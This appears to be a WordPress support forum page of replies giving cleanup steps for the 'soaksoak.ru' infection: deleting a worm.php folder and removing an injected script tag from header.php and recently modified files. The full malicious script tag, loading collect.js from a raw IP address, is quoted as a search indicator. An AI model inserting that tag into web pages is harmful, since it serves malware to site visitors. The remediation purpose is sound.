daljitsingh881
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: soaksoak.ru MalwareHI,
how can I see what files they are? I looking for the recently updates files.Hello dear,
Just follow step 2,3 & 4
Step1: remove the folder containing worm.php.
Step2: Go to admin panel of wordpress >>appearance>>editor>>header.php
Step3: Hit (Ctrl+f) and search for
<script language=”JavaScript” src=”https://122.155.168.105/ads/inpage/pub/collect.js” type=”text/javascript”></script>If you will not find anything with above query, just search for
122.155.168.105
Still if you will not find anything just recheck the above IP address with the IP address mentioned in Google chrome error page if they do not match, then you have to search for the IP address mentioned in Google chrome error page.
Now you can proceed further with step 4 & 5.
Now you have to login to your ftp and check out for recently updates files (There would be 4-5 files) open these recently updated files one by one and repeat the Step3, Step4 and Step5 mentioned above.
The above files would be index files and login files.
I hope this would help you to resolve the problem
Forum: Fixing WordPress
In reply to: soaksoak.ru MalwareMy company is running 8 websites on shared hosting, some websites are static and others are running on wordpress, three days back all our websites got infected.
First of all I tracked down the root of the problem, it was a folder in one of my website having php file named “worm.php”
Step1: remove the folder containing worm.php.
Step2: Go to admin panel of wordpress >>appearance>>editor>>header.php
Step3: Hit (Ctrl+f) and search for<script language=”JavaScript” src=”https://122.155.168.105/ads/inpage/pub/collect.js” type=”text/javascript”></script>
Step4: Delete all the results of above said line.
Step5: Save the file.50 percent problem is solved.
Now you have to login to your ftp and check out for recently updates files (There would be 4-5 files) open these recently updated files one by one and repeat the Step3, Step4 and Step5 mentioned above.
Now your website will be working, but to ensure that, there would not be any malicious code stay hidden in some file.
Got to the wordpress admin panel and update your wordpress.
In some case you will get internal server error while trying to access https://www.yourwebsite.com/wp-admin. In that case you have to upload the fresh copies of wp-admin and wp-include folder & wp-login.php file.